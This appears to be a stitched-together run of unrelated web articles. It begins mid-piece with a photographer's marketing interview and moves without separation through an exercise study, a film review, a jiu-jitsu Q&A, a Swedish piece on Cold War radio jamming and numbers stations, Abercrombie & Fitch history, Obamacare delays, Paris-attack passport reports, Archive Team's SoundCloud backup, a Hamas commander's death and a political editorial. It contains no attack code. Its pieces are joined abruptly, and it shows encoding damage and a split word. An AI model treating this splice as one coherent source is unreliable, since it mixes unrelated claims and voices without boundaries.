Today, the Brooklyn, N.Y.-based photographer's portfolio includes work for commercial brands like Converse, Nike and Smirnoff. Granado is also a founder of Yonder Journal and Manual for Speed, two creative projects partially underwritten by brands. “I don't think of myself as specializing in one thing,” Granado says. “I do quite a bit documentary style work, but also commercial and lifestyle stuff, portraiture and more humorous and youth culture stuff.” Here, Granado gives insight into their marketing strategy, which they describe as a “constant, pleasant background hum. Not a series of loud pops and bangs.”
￼What types of clients are you trying to attract? Who are some of your favorites or ideal clients? ￼
I'm kind of all over the place. I think it's great that I speak many languages, but sometimes it can be difficult to market yourself. Since I do so many things, I'm trying to attract a bunch of different clients. I'm definitely interested in portraiture. But I'm also looking for lifestyle/ youth culture clients, as well as sports, athletics, and outdoor stuff. And because I think I'm pretty versatile, spontaneous and shoot a lot compared to other photographers, I'm well suited to shoot large image libraries for brands.
I have a long relationship with Outlier Clothing that exemplifies the type of client I like. I get to shoot portraits, fashion, outdoors, in-studio and athletic style images for them. They are fusing tech, fashion and motion into one brand, so I get to flex different muscles.
Where do you focus most of your marketing efforts? Why?
You can choose to market yourself with big, loud tactics. I've chosen a slower approach with my marketing; I'll call it “white noise marketing.” The secret for me has been to continue to produce quality images and quietly remind people about them. To do this, I like to send people anywhere from five to eight postcards a year and usually write something funny and personalized on the back. I'd hate to be the photographer version of a used car salesperson with loud gimmicks and cheap suits.That's not the association I want people to make when they think about my work.
The focus for me has always been and will always be “make good work.” Of course, I can do things to help promote that work, but if it sucks to begin with, then I'm failing. I'll continue to self publish and create personal work—that is essential to me as a human and as a brand. How does this translate into new and returning clients? Every year since I started getting work, my business has progressively improved. The assignments get better. The budgets get bigger. I can't really say any one thing is getting me new clients. But the cumulative efforts of producing good work and showing people that work over the last 10 years is yielding results. ￼What's your digital marketing strategy? There are so many ￼￼outlets these days; what do you find the most effective? I've given up on several digital formats recently. I simply don't have the time to make them compelling or interesting. They become a “Hey, look what I shot” thing, and that gets boring. So I've honed it down to Instagram, a (almost) quarterly newsletter, and very infrequent Facebook and tumblr posts. Also, when I have a new project, I'll share it with blogs or content aggregators. Depending on the project, I would share it with the editors at the photo blogs for The New Yorker, MSNBC or Time Lightbox. For press I try to share everything with PDN, but then I try to cast a wider net and have built relationships with design and art blogs like It's Nice That, Coolhunting, etc. There are several cool small-scale photo blogs/aggregators that make sense for me like Flak Photo, Lintroller, Paper Journal, etc. ￼How much time to you devote to marketing efforts? What's your workflow like for fitting it all in? ￼ I think about marketing quite a bit. I like to send emails and introduce myself to potential clients and influencers. You have to build your network in order for that network to pay off for you. I don't have an established workflow for it. Between travel, shooting, family, trying to ride my bike and everything else, you find some time here and there to try to reach a new potential client. If I find out about a new agency doing cool things from a blog or Instagram post, I try to find out who the art directors are and send them postcards. Maybe I'll email them and try to set up a meeting. It depends on how much free time I have and how brave I'm feeling that day. And that hits an important point. You have to be brave. You have to learn to put yourself out there and not get a response from someone. In general, you'll reach out to 100 people and only 20 of them will respond, and of those you'll only ever meet five of them in person and maybe one of those people hires you down the line two years from now. So you just spent several hours trying to reach 100 people and you failed 99 times. But that one person. . . Can you explain your online $10 print sales? I published a new photo every week in 2014 and made 3 prints of it and sold it for $10 each. Just enough to break even. You can still see all the photos on www.quesofrito.com. It was about forcing myself to publish work that was sitting on my hard drives. It was also a way to get people excited about the work that I was excited about. I had to honor those images by putting them into the world. Otherwise, no one would have ever seen them. Can you point to some specific successes that have come directly from your marketing efforts? ￼ I can think of two really specific successes. Many years ago, I found a cool new agency somewhere on the Internet. They had just started out and were doing some cool small projects. I found their address and sent them a postcard with a funny message. They really liked it and posted it on their blog. I eventually met them in person to say hi. We stayed friendly for years, and last year they asked me to shoot a really great project for a big athletic brand. Back in 2008, I published a newsprint publication called “Thank God That's Over.” It was a humorous photo essay taken on a five-day cruise from New Jersey to Bermuda. It was every bit as awful as you can imagine. To this day, people still reference that newsprint thing. I learned that to make good photos is not enough. You have to package them up nicely and deliver it to the world in a format they will enjoy. ￼What marketing dos and don'ts have you learned along the way to attract the clients you want? ￼ I try to engage potential clients the way I'd want to be engaged myself. Don't be annoying, don't be pushy, don't be irrelevant. Be entertaining, be yourself, speak candidly, don't be a robot, spellcheck, use pretty colors. ￼What advice do you have for new photographers about how to market to commercial clients in today's changing photography landscape? You have to approach this whole thing as a long-term thing. Just because a photo editor followed you on Instagram doesn't mean you're going to get a job. Just because they responded to your email doesn't mean you're going to shoot the cover. You're going to bid a thousand jobs and not get any of them. You're going to strike out a million times before you get any jobs. No one owes you a damn thing. It's a slow, slow process, so bunker down for the long haul. The only thing that you can control is your creative output. Make sure it's fire. Want more tips on how to start getting your dream commercial clients? Download the Guide today!
Like this: Like Loading...
If you want to burn fat, it's better to hit the treadmill than the weight room, a new study suggests.
The results show aerobic workouts are better than resistance training for reducing fat mass.
And a workout that combines the two activities — lifting weights in addition to running — is no better at burning fat than running alone, the researchers said. The findings contradict the idea that resistance training can help with weight and fat loss by improving metabolism, the researchers said.
But the findings don't mean that resistance training is not useful. The study found that resistance training was better at increasing lean body mass than aerobic training alone. And for older adults who are experiencing muscle loss, resistance training is beneficial, the researchers said.
But for young, healthy adults who want to lose weight, aerobic training may be the way to go.
"Balancing time commitments against health benefits, our study suggests that aerobic exercise is the best option for reducing fat mass and body mass," said study researcher Cris Slentz, an exercise physiologist at Duke University in Durham, North Carolina. "It's not that resistance training isn't good for you; it's just not very good at burning fat," Slentz said.
The study involved 234 overweight and obese adults who did not have diabetes, and did not exercise regularly before the study. Participants were randomly assigned to one of three workouts: a resistance training workout (consisting of three days of weight lifting per week); an aerobic workout (running 12 miles a week); or a combination workout (three days of weight lifting plus 12 miles of running a week). The workout regimens lasted eight months.
The aerobic training group and the combination group lost more weight and fat mass than the resistance-training group.
Despite requiring double the exercise time, the combination workout did not reduce body mass and fat mass beyond what was seen in the aerobic training group, the researchers said.
While some studies suggest resistance training can improve metabolic rate, and thus allow people to burn more calories, the new results do not suggest this. Regardless of participants' metabolic rate, they did not lose more weight or fat mass with resistance training.
"No one type of exercise will be best for every health benefit," said study researcher Leslie Willis, an exercise physiologist at Duke. "However, it might be time to reconsider the conventional wisdom that resistance training alone can induce changes in body mass or fat mass due to an increase in metabolism, as our study found no change."
Although a focus on weight loss is understandable, "when considering the big picture, I like to encourage individuals to pursue a complete exercise program — including both aerobic exercise and resistance training," said Barbara Bushman, a professor at Missouri State University's Department of Kinesiology who was not involved in the study. "If time is limited and it comes down to one or the other, this study, as well as [statements from the American College of Sports Medicine] would seem to be in agreement that aerobic exercise along with dietary restriction are of the greatest benefit," Bushman said.
The study is published in the Dec. 15 issue of the Journal of Applied Physiology.
Pass it on: Aerobic workouts are best for fat loss.
Related stories:
IBTimes Rating: 1
The word "Boo" can be used in two different ways. The first entails sneaking up on someone and yelling it in order to startle them and get their pulse racing. However, it is the second, which entails showing the thumbs-down and mouthing the word meanly, that "1920 London" deserves.
The entire "1920" franchise has tried its best to be a spook-fest, "tried" being the operative word here. And the third of the trilogy is probably the weakest effort so far. At no point of time is the audience given enough ingredients for them to stew in their own juices, which is an ideal ingredient when it comes to the business of scaring people for money. The anticipation and build-up of a scare sometimes make it juicier.
Sadly, "1920 London" makes no such effort. Now it's run-time may be a few seconds more than the two-hour mark, but even that could have been enough to scare the heebie jeebies out of the viewer with the correct ingredients such as tight story-telling, a menacing ghost that has genuine motivation to attack and be feared, and a departure from tropes like flickering lights and creaky wood. The end-result, though, is disappointment and little else.
So when a trinket sent to a happy couple from Rajasthani royalty staying in London affects the husband, the wife (Meera Chopra) returns home to find a cure for the "black magic." And the only person who can apparently help them is an embittered ex-lover (Sharman Joshi). The premise is established quite fast, and this pace of narration is maintained almost throughout. However, none of the characters, nor their motivations for doing what they do, seem compelling.
One reason for that could be the lack of character or situation build-up. And when the audience is distracted from the story because there is very little to it, other discrepancies and anachronisms â€” especially time-inappropriate dress, furniture or anything else for that matter â€” jump up like eyesores.
The puerile visual effects, almost stereotypical music and the overall lack of acting makes matters much worse. In fact, "1920 London" could easily have been masquerading as a zombie movie, with even the usually dependable Sharman nearly sleep-walking through their role. And let's not waste words on the rest of the cast.
All said and done, the only bright spot of "1920 London" is its soundtrack, with a couple of romantic songs best kept aside for Valentine's Day mixtapes. Otherwise, there's no use wasting good money on this flick.
And here's a little afterthought: If this indeed is the true form of director Tinu Suresh Desai, my expectations from "Rustom," their upcoming flick starring Housefull 3" star Akshay Kumar just hit rock bottom.
—————————— QUESTION ——————————
Hi Stephan,
First of all, I want to thank you for creating your instructional apps and having these frequent tips/newsletters. They have really helped me to get started in BJJ. Even though I have been signed up to receive your emails for a while now I have only just begun my training.
A problem I've been having is that no matter if someone is in my guard or I am in there's my mind goes blank or rather starts thinking about all the techniques I have learned and which one to use. This causes me to get frustrated feeling that I am wasting my partners time by not being much of a challenge for them, and that when I do get past their guard I tend to stop wanting to start over not sure of what I should do next if we continued (if you can't tell I tend to overanalyze things).
Any suggestions as to how I can overcome this this just something that will get better with more training? Ultimately I want to be a training partner that will not only help others to improve their game, but also be able to improve my own.
Thanks,
Fred
—————————— ANSWER ——————————
Hi Fred,
This is a tough question to answer since we don't train together regularly. But a LOT of people have the same problem, so let me take a stab at it…
First of all, it may simply be that you haven't been training long enough. The first couple of months of a grappler's career can be frustrating and difficult, in part because grappling is SO different from most of the day-to-day activities of an average person.
So you may find that this problem goes away, all on its own, just with a little bit more accumulated mat time.
Another part of the problem might be that you're being overwhelmed by the almost limitless number of choices that you have in the guard. Have you heard of Hick's law which states (roughly) ‘The more choices you have the longer it takes to make a decision.‘
Therefore maybe you should try limiting your choices.
Try going for only ONE thing from the guard when you're sparring for a little while. And this DOESN'T need to be a complete technique – it can be as simple as gripfighting to get the specific grip you want (collar and sleeve, double sleeve, head control, overhook, etc.) and then trying to hold that for as long as you can.
If you get that grip, hold it for 30 seconds, but eventually your opponent passes your guard and smashes you then YOU'VE STILL WON because you achieved your one objective
Then, as time goes on, you make your game incrementally more nuanced. Get the grip (which should be second nature after a few sessions) and move onto the next step. Let's say your ultimate goal is a submission which requires you to get your foot on your opponent's hip. Well, your goal is now to get your grip AND get your foot on the hip. If you achieve that, once again you've won, no matter what happens next.
Then move on to the next step in your progression, training it the same way.
Limiting your choices and building your moves incrementally like that should help you avoid feeling as overwhelmed.
Finally, one other strategy you could try is training some of your techniques BACKWARDS.
In backwards training you don't even worry about how to get into or set up a technique. Instead you start by first getting really comfortable with the final position in a technique.
Once that final position feels natural and normal, and your body is used to being there, then it often becomes a lot easier to figure out how to get to that position. The entries become a lot more natural, and applying that technique feels about as normal as walking down the block to get to your home.
For an example of backwards training in action check out this video breakdown of the X Guard. Either watch the whole thing or skip ahead to about 3:14 to see how you might apply this concept to the X Guard position.
I don't know you personally, so of course I may be offering you good solutions for the wrong problems. But give these suggestions a try – they're a good place to start anyways.
Stick with it, I'm sure you'll figure it out!
Cheers
Stephan Kesting
Comments ( )
“This is the BBC World Service. News at the top of the hour. BZZZZZZZZZZZZZZZZZZ”.
Så lät det för det mesta på kortvågen under kalla kriget. BBC:s kortvågssändningar var särskilt förhatliga för diktaturerna i östblocket. Deutsche Welle, Radio Free Europe och Voice of America var andra röda skynken.
”Det ryska bruset” i bemärkelsen svårtydda radiosändningar från Ryssland, är och har varit flera saker, med varierande ursprung. Det finns mycket brus, buller och störningar på radio över huvud taget. De radioband som spänner över hela världen är ingalunda något lugnt ställe, utan de kokar ständigt av störningar, stationer som sänder ovanpå varandra och allehanda pip, tjut och brak. Mycket av eländet kommer från Ryssland, även om det har minskat betydligt sedan Sovjetunionen föll.
En av de bästa kortvågsmottagarna någonsin, en Drake SPR-4. Den uppfångar allt på kortvågen med mycket stor noggrannhet. Bild: Universal Radio, Inc.
Man kan dela upp de svårtydda radiosändningarna i tre typer: störsändare avsedda att dölja annan information, buller- och nummersändare avsedda att överföra hemlig information och kortvågsradar avsedd att hitta interkontinentala robotar bortom jordens krökning.
Störsändare för att hindra informationsflöde
Trots hot om hårda straff satt medborgarna i östblocket med öronen på helspänn och försökte så gott det gick att lyssna på västeuropeiska nyhetssändningar och Vatikanradion (religion var förbjudet i Sovjet). De enda stationer som slank igenom utan störning var av typen Radio Luxemburg, som var opolitiska.
Längs Sovjets gränser stod störsändare som riktats in mot unionen, för att med vrålande kortvågsbuller döda all influens utifrån, även om det aldrig lyckades helt i gränstrakterna. Även tv-sändningar från väst, som läckte in över östblockets gränser, stördes på detta sätt. Avsikten med en störsändare är att dränka en oönskad sändare med en bärvåg modulerad med sådant ljud och med sådan uteffekt att inget ursprungligt ljud kan höras. Eftersom sovjeterna inte brydde sig så mycket om följdskador kunde störsändarna på kortvåg höras alldeles utmärkt i Sverige också.
Modern reseradio med kortvåg, utmärkt att lyssna på störsändare med. Bild: Stefan Kühn, CC0.
Diktaturer har alltid velat hindra medborgarna från att skaffa sig egen information från omvärlden. Där har Ryssland dessutom haft en fördel, eftersom resten av världen talar engelska, vilket få ryssar gör. Störandet stod på sin höjdpunkt under kalla kriget (1946-1990) men det förekom ända till Sovjetunionens fall 1991. Numera är det andra diktaturer som stör, som Kina, Iran, båda Korea, med flera.
Här kan du läsa en omfattande lista.
Nummersändare och bullersändare
Nummersändare sänder en särskiljande ton eller annat ljud under lång tid och avbryter då och då för ett talat meddelande. Bullersändare som den välkända UVB-76, fungerar som markörer eller fyrar på en bestämd och välkänd frekvens, som antingen agenter planterade i utlandet kan ha som källa till meddelanden vid bestämda tider, eller som militära enheter i fält kan få order ifrån.
En ton eller tonserie som pågår dygnet runt i flera månader eller år kan inte ha något informationsinnehåll, annat än att visa att den existerar och tjäna som riktmärke för en lyssnare som vet när det är dags att lyssna. En tonserie behövs för att sändaren ska skilja sig från en tom, omodulerad bärvåg, som också låter som ett tjut, som kan komma från var som helst eller vara en blandningsprodukt (falsk bärvåg). Dessutom vet man att den dag sändaren tystnar, har det hänt något allvarligt. Ryssland är ingalunda ensamt på scenen. Nummersändare finns sannolikt också i England, USA, Kuba, Iran med flera.
Just UVB-76 (The Buzzer), eller numera MDZhB (МДЖБ) är involverad i den militära ordergången i det ryska västliga militärdistriktet (i vilket Moskva och St. Petersburg befinner sig). Den sänder surr under långa tider, som då och då avbryts av kodade talmeddelanden. Talmeddelandena hålls på ett format kallat ”monolit” med rysk militär terminologi och sänds mellan ett högkvarter och underordnad militär enhet. Avsikten med meddelandena är att prova om enheten är redo, för utbildning, varningar och meddelanden om mobilisering.
Kodböcker måste vara små. Här är en som är så liten att man behöver ett särskilt förstoringsglas. Bild: Kanadensiska säkerhetspolisen
En hemlig agent kan inte svara på en sändning utan att avslöja sin position. Därför är meddelandena enkelriktade. För att vara säker på att meddelandet uppfattas, upprepas det väldigt många gånger. För att vara säker på att kryptot inte kan knäckas används i de fall man känner till så kallade kodboks- eller engångskrypto, där nyckeln är lika lång som meddelandet. Kodböcker är kända i en mängd olika format, avpassade för skoklackar, puderdosor etc. För att agenten inte ska behöva skaffa avslöjande specialutrustning, sänds meddelandena som mänskligt tal på helt vanlig kortvåg.
De krypterade sändningarna kan låta på en mängd olika sätt, oftast som långa, upprepade nummerserier som läses timme ut och timme in, men även som tonserier, polytoner, teletypeströmmar, data, otydbar morse, brusstötar och så vidare. Detta ska dessutom skiljas från kända fenomen som Sitor, Amtor och PSK31-paketradio, slowscan-television, frekvensskiftad teletype och vad som för ett otränat öra kan låta som rent brus: drm, digitala stereosändningar på kort- och mellanvåg.
OTH-radar – en råstark sändare
Under 1976 började det ticka oroväckande i de allra flesta västliga kortvågsmottagare, nästan oavsett inställd frekvens. Ibland tickade det likadant även i grammofoner och bandspelare. Det handlade om en råstark sändare med mycket breda sidband, som sände mycket korta pulser.
Avsikten med Duga-3 i Tjernobyl var att hitta det joniserade spåret från flamman när en interkontinental robot sändes upp från nordamerikanskt territorium eller någon ubåt däromkring. Raketen i sig själv är för liten att upptäcka, men flamman drar ett joniserat spår i atmosfären som är en mycket bättre radarreflektor. Metoden tycks ha fungerat, eftersom Duga-3 kan antas ha varit driftversionen efter Duga-1 och -2.
Duga-radarn i Ukraina, var riktad nordväst mot Stockholm (!), över Mellansverige och mot Nordamerika via Grönland. Om du tittar närmare på staketet ”The Fence” i filmen ”Divergent” av Neil Burger ser du att det är en långversion av Duga. Bild: Ingmar Runge, CC BY 3.0
Så här ser radarn ut uppifrån. Notera att det här bara är sändaren. Mottagarstationen ”RF A3330” är inte alls så imponerande och står 57 kilometer nordost om de tio megawatten.
Europakartan visar varför Sverige var extra hårt drabbat av Duga-3. Vi ligger i vägen, på väg mot det nordamerikanska fastlandet.
Duga lades ned 1989. Sedan dess har det kommit nya, bättre metoder att hitta nyligen avskjutna raketer, till exempel infraröd-seende satelliter.
Slutsats
Sedan det kalla kriget har mycket hänt på kommunikationsfronten. Slagfältet har flyttats till internet och kortvågen har minskat i intresse. De stora nyhetsbyråerna sänder inte längre telegram på kortvågen utan använder internet. Krigföring i etern var bara gårdagens cyberkrigföring. Störsändarna var bara gårdagens ddos. De utförde precis samma tjänst, att förhindra åtkomst till information.
Tro för den skull inte att kortvågen har blivit helt ointressant. Även om Tor är ett bra sätt att överföra hemlig information på internet, använder sig terrorgrupper fortfarande gärna av kortvåg för sina mail, eftersom det är betydligt svårare att avlyssna än internet.
Du kan ha mycket roligt med att lyssna på kortvågsradio, bara du lär dig känna igen de olika modulationstyperna. Att lära sig sköta en kortvågsradio intill perfektion är som när en musiker som lär sig spela ett instrument på gehör.
Läs mer:
Tidigare artikel om nummersändare
Nummersändare i världen
Särskilt om The Buzzer
UVB-76
Hackspetten
SITOR
PSK31
Slow-Scan TV
En spännande spionberättelse med Stasi, kortvåg och hemliga koder, som kan ha varit verklig
Abercrombie & Fitch, American clothing retailer marketing casual wear to preteens, teens, and young adults. Headquarters are in New Albany, Ohio.
Abercrombie & Fitch originated in 1891 as a retail sporting goods concern based in New York City. It was famed for its wide variety of expensive and often exotic sporting equipment and attire, ranging from tennis shoes to elephant guns. For more than half a century, the store's apparel, guns, tackle, and other merchandise were the image of correctness and opulence, inspiring the American humorist Ed Zern to lampoon a perfectly accoutred angler as an “Abercrombie and Fitcherman.”
When it expanded, the firm confined its new branch stores to downtown areas of large cities and to resort areas. In the early 1970s Abercrombie & Fitch attempted to widen its customer base by adding less-expensive items to its usual stock and by moving into the suburbs, where other stores had been building for some time. Although these steps did attract new customers, they came too late; Abercrombie & Fitch was in financial trouble and filed for bankruptcy in 1976 after 85 years in business.
Oshman's Sporting Goods, Inc., bought the firm in1978. In 1988 Abercrombie & Fitch was bought by The Limited, Inc. Repositioned as the trademarked “casual luxury” brand, it became parent to the subsidiary brands abercrombie kids, a children's line launched in 1998 and marketed as abercrombie; Hollister Co., a line for younger teens launched in 2000; RUEHL No. 925, a line targeting post-graduates launched in 2004; and Gilly Hicks, a women's line launched in 2008. Following Abercrombie & Fitch's overhaul, the company received significant criticism for its advertising and its clothing, which were perceived by many as encouraging its target audience to adopt a sexually promiscuous lifestyle.
The Obama administration will announce its tenth Obamacare delay later today, this time extending the March 31 enrollment deadline for people who say they've been unable to enroll in health plans in the federal marketplace by the deadline. The extension applies to the federal exchange operating in three dozen states and is expected to last for two or three weeks.
Can't remember what all the delays have been? Politico provided a helpful history of Obamacare delays from most to least recent:
March 25: Final enrollment deadline extended. The March 31 deadline — the end of enrollment for 2014 — will be loosened for people with special sign-up circumstances.
March 14: High risk pools extended. The special, temporary coverage for people with serious pre-existing conditions — which was only supposed to last until the health insurance exchanges were in place — was extended a third time for another month.
Feb. 10: Employer mandate delayed. This time, businesses with between 50 and 100 workers were given until 2016 to offer coverage, and the mandate will be phased in for employers with more than 100 workers.
Jan. 14: High risk pools extended. The high-risk insurance pools, which originally had been slated to close Jan. 1, had already been extended once.
Dec. 24: Enrollment deadline extended. In a message on HealthCare.gov, customers were told they could get help to finish their Jan. 1 applications if they were already in line on Dec. 24.
Dec 12: Enrollment deadline extended. Customers on the federal enrollment website were given nearly two more weeks to sign up for coverage effective Jan. 1.
Nov. 27: SHOP delayed. Online enrollment for the federal health insurance exchanges for small businesses was delayed.
Nov. 21: Open enrollment delayed for 2015. The administration pushed back next year's enrollment season by a month.
July 2: Employer mandate delayed. The administration declared that it wouldn't enforce the fines in 2014 for businesses with more than 50 full-time workers who don't offer health coverage. The fines were pushed back to 2015.
Nov. 15, 2012: Exchange deadline delayed. The Department of Health and Human Services gave states an extra month to decide whether they would set up their own health insurance exchanges — a decision they announced just one day before the original deadline.
The identity on one of the Syrian passports found near a terrorist who detonated a suicide belt in the Paris terror attacks may belong to a Syrian soldier killed fighting for the regime of Syrian President Bashar al-Assad, a French official close to the investigation told AFP.
The document is in the name of Ahmd Almohammad, 25, born in Idlib, north west Syria, and was found by the body of one of the attackers who detonated a suicide belt near the Stade de France. The details correlate with those of a Syrian soldier killed several months ago, said the official.
The official said the passport was either forged or taken from the original holder.
Earlier, Serbian officials told The Guardian that a man had been arrested in Presovo refugee centre after the attacks bearing a passport with the same name and details as on the passport found near the Paris terrorist, but a different photograph.
Greek officials said on Saturday 14 November that the passport found in Paris had been used to enter the island of Leros on October 3 by someone claiming refugee status. The passport was then used to enter Croatia by way of Macedonia and Serbia. Serbian officials believe that it is a forgery made on the Turkish/Syrian border.
Anti-immigration politicians throughout Europe have called for governments to reverse their policy of accepting refugees in the wake of the crisis.
The United States' Olympic women's volleyball team could have used a weapon like this during the London Games.
In a girls' high school volleyball match late last month, a scary moment occurred when a Holy Trinity Catholic High (Iowa) player delivered a powerful spike against Winfield-Mount Union that nailed an opposing player in the face. As the injured player hit the floor, the ball didn't stop traveling. It ricocheted off the Winfield-Mount Union player and then hit an unsuspecting fan walking toward the door.
Fortunately, the Winfield-Mount Union player was fine and didn't suffer any major head injuries, coach David Pieart told Yahoo's Prep Rally.
The fan got up immediately and ran out of the gym.
Given how the ball managed to take out two people, Sports Grid dubbed it as "the most lethal girl's volleyball spike of any and all time." It's hard to argue with that title. Although Business Insider's description of the double takeout as the "best two-for-one deal ever" probably has adherents among Holy Trinity Catholic fans.
Holy Trinity Catholic went on to win the match 3-0 to earn a trip the Iowa State Tournament.
Volunteer collective Archive Team has announced that it will undertake a large-scale backup of SoundCloud via its virtual archiving appliance, ArchiveTeam Warrior, starting tomorrow, July 18th. The move is designed to preserve the SoundCloud archives in the event that it shuts down, following news that the company recently underwent a massive round of layoffs. SoundCloud says it is here to stay and that its archives are not in danger of disappearing.
Archive Team was founded in 2009 by Jason Scott, with the mission to preserve the historical records of websites and services considered “at risk.” According to its site, warning signs for an at-risk website include mass layoffs, neglect, decay, or owners missing in action. Other archive projects the group has tackled include GeoCities, Google Video, Friendster, TwitPic, and Verizon Personal Webspace.
TechCrunch reported last week that SoundCloud only had enough money “to have runway ‘until Q4.'” SoundCloud denied that report, saying it is in no danger of closing. A statement released by SoundCloud co-founder Alex Ljung on Friday says “SoundCloud is not going away. Not in 50 days, not in 80 days or anytime in the foreseeable future. Your music is safe.”
The ArchiveTeam Warrior runs in volunteers' operating systems using a virtual machine, scraping the content of at-risk websites and eventually uploading it to the Internet Archive on the Archive Team collection.
Archive Team plans large scale backing up of Soundcloud soon, but seriously, please donate money to the Archive. https://t.co/0Oz1IFVWWD — Jason Scott (@textfiles) July 14, 2017
The group says it believes SoundCloud's service to be in danger, citing a 2015 suit threatening to take the company to court for unpaid royalties, a 2016 report by financial auditor KPMG stating “significant doubt on the company's ability to continue as a going concern,” and the recent news that SoundCloud fired 173 staff members.
In 2014, SoundCloud stored 2.5 petabytes of data on Amazon Glacier, and as of April 2017, all the 128 kbit/s MP3 streams that comprise SoundCloud's public tracks totaled 855 terabytes. Archive Team says it has prepared to save tracks selectively, as “a full grab would be too big and would raise concerns of mass copyright infringement.” Archive Team has historically sought to preserve the earliest years of a service's files, as they are least likely to exist anywhere else, the organization told Motherboard.
HOLLYWOOD, Fla. - Hollywood condominium owners are blaming live-aboard boaters for a dirty Intracoastal Waterway behind their complex.
Residents of The Moorings condominiums near North Beach Park in Hollywood told Local 10 News reporter Todd Tongen that the live-aboard boaters are nothing more than squatters on the water.
Marybeth Cullinan, a Moorings homeowner association member, reported seeing raw sewage dumped in the waterway.
"Where is the waste going?" Cullinan said. "We have seen them with buckets in the morning, throwing buckets over the side."
Kerry Lock, a live-aboard boater, said otherwise.
"That is not true at all. I know every live-aboard here and nobody is dumping sewage in the water, much fewer buckets of it," Lock said. "I use the bathroom, and so do most of the other people."
Cullinan said they doubt Lock's story.
"They claim that they use the bathrooms in the facilities over at the park, but that is highly unlikely when the bathrooms are only open from 7:30 (a.m.) to 7 o'clock at night," they said.
Condo residents said the boaters also have generators on board and carelessly transport fuel to their boats. Some mentioned seeing abandoned boats that interfere with navigation on the waterways.
"Two boats have sunk. One was a really big sailboat, and the mast was just sticking up," Cullinan said. "It costs the taxpayers of Broward County to have two boats removed."
News of a dirty Intracoastal not only concerns condo owners, but other Hollywood residents who enjoy fishing in the water. Angler Mike Stewart told Local 10 that they will now strictly catch and release in the area.
"That is kind of disgusting, now that you think about it," Stewart said. "If you want to eat the fish out of here, when there are human feces in there."
The city of Hollywood said it is aware of the problem and is working with the county, which has partial jurisdiction over the water, along with the federal government, to find a solution.
Copyright 2016 by WPLG Local10.com - All rights reserved.
A senior Hamas field commander died Sunday of wounds incurred a day earlier in an accidental blast, the Gaza-based terror group said.
Hamas's military wing, the Qassam Brigades, said in a statement posted to its official website that high-ranking field commander Muhammad Hemada Walid al-Quqa, 37, di
ed Sunday morning. Other reports from Gaza said they were 44 years old.
Get The Times of Israel's Daily Edition by email and never miss our top stories Free Sign Up
According to the statement, Quqa was “preparing equipment” in the field when they were injured in an explosion.
According to Israel's Channel 2 news, Quqa was the head of Hamas's explosives unit and the Qassam Brigades said they had been involved in “manufacturing and assembling explosives,” among other activities.
The Hamas commander, the statement added, was from the al-Shati refugee camp in northern Gaza.
Palestinian media posted a picture of Quqa on Twitter.
صورة الشهيد القسامي محمد وليد القوقا 44 عاما سكان الشاطئ غرب غزة ..#شهداء_الإعداد#رجال_القسام#كتائب_القسام pic.twitter.com/Y3KQIkyGUV — سندس عماد #غزة (@sondosEmad1993) February 5, 2017
The Palestinian website al-Resalah, which is affiliated with Hamas, said the explosion that killed Quqa occurred in the Sudaniye area in northern Gaza.
The report quoted medical sources who said the Hamas commander had been brought to the hospital with their arms and legs blown off.
The terror group held a large funeral for Quqa in Gaza on Monday, complete with signs claiming that they had been killed while “preparing something for the enemy,” the Channel 2 report noted.
Hamas, which is openly committed to the destruction of the Jewish state, daily continues to train its fighters, builds rockets and digs tunnels in preparation for another round of conflict with Israel.
Last year, 22 members of Hamas's armed wing were killed while “preparing equipment,” the majority in a string of tunnel collapses, the terror group said last month.
Gaza terrorists have dug dozens of tunnels, many reaching across the border into Israel, to launch attacks against the Jewish state; Israel destroyed many of them during the devastating 2014 war with Hamas. It says Hamas has since been rebuilding the network, and Hamas has bragged about doing so.
Israel and Hamas have fought three wars since 2008 and Gaza has been under an Israeli blockade for a decade, imposed by Israel and Egypt to try to prevent it importing weaponry.
After the US elections: An intensification of war and social counterrevolution
10 November 2014
It is less than one week since the US midterm elections, and already the Obama administration, in alliance with Republican and Democratic congressional leaders, is moving aggressively to implement unpopular policies that were entirely excluded from the election campaign.
On foreign policy, the White House announced Friday that the US will send an additional 1,500 troops to Iraq, doubling the number of US soldiers there. Administration officials also said they will request $5 billion from Congress to fund the operations in the Middle East ostensibly targeting the Islamic State of Iraq and Syria (ISIS).
President Obama has let it be known that they will seek a new congressional authorization for use of military force for expanded operations in the Middle East (including against Syria). By mutual agreement, Democratic and Republican lawmakers had scuttled out of Washington for their pre-election break without taking up the issue of authorizing the new Middle East war.
These measures give the lie to Obama's pre-election pledge that no US troops will be sent into combat in Iraq or Syria. They were undoubtedly decided on before Election Day, but concealed during the months-long campaign so as deprive the American people of having any chance to express their attitude at the polls. Such is the reality of American “democracy.”
On all major questions that affect the lives of the broad mass of the population—beginning with the issue of war—working people have no say. The elections are exercises in deceit and manipulation. All important decisions are made in secret by the military/intelligence agencies and the corporate elite whose interests they defend.
Thus, the first major act by Obama after the election was to hold a closed-door White House meeting at which the congressional leaders of both parties received their marching orders from General Lloyd Austin, the head of US Central Command, which oversees military operations in the Middle East, North Africa and Central Asia.
The second major announcement, also on Friday, did not come from Washington, but it had the full support of the White House and both parties. This was the approval by federal bankruptcy judge Steven Rhodes of Detroit's “plan of adjustment” to exit bankruptcy.
The plan, drawn up by Emergency Manager Kevyn Orr, a close ally of the White House, is a frontal assault on the pensions and health benefits of city workers, combined with a sell-off of public assets, to pay off the Wall Street banks and bondholders that have been bleeding the city dry for decades.
The bankruptcy of Detroit, once the center of auto manufacturing in America and the world, is part of a bipartisan policy of social counterrevolution that has already produced a massive transfer of wealth from the working class to the rich. In the days since the election, Obama and House Republican leaders have indicated they will seek agreement on a sharp reduction in the corporate tax rate, among other reactionary measures.
Neither party discussed the ever-greater concentration of wealth at the very top or the relentless assault on the working class during the election campaign. Their secret agenda of new handouts to big business and new attacks on social programs and working class living standards was deliberately concealed.
Obama themselves delivered a campaign speech in Detroit just days before the election and the deadline for Judge Rhodes' ruling and never even mentioned the bankruptcy. This is the same man who months before had declared they would spend their remaining time in office focusing “like a laser” on the problem of social inequality.
The Republican victory last Tuesday was not the result of a surge in popular support for the Republican Party or its right-wing policies. It was the result of the collapse of the Democrats. Record-low voter turnout reflected above all the alienation and bitterness of working people and youth who had no interest in voting once again for an administration and party that worked hand-in-glove with the other right-wing party of big business to attack their living standards and democratic rights and go from one imperialist war to another.
The estimated turnout for the elections stands at 36.4 percent, the lowest since 1942 (when many voters were unable to cast ballots due to the Second World War). In many of the most significant states in the country (including California, New York, Indiana and New Jersey), turnout was less than a third. This means that in most races, the winner received the votes of only 15 to 20 percent of the electorate.
